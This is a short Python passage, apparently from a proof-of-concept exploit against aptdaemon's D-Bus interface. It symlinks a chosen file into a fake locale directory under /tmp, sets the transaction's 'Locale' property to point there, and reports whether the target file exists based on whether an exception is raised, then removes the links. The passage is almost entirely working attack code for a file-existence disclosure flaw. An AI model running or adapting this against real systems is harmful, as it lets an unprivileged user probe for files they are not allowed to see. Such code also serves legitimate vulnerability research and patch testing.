os.symlink(FILE_TO_CHECK, "/tmp/a/LC_MESSAGES/aptdaemon.mo")

try:
	properties_manager.Set("org.debian.apt.transaction", "Locale", "/tmp/a.")
except:
	print("File Exists!")
	pass
else:
	print("File does not exist!")

os.unlink("/tmp/a/LC_MESSAGES/aptdaemon.mo")
os.rmdir("/tmp/a/LC_MESSAGES")
os.rmdir("/tmp/a")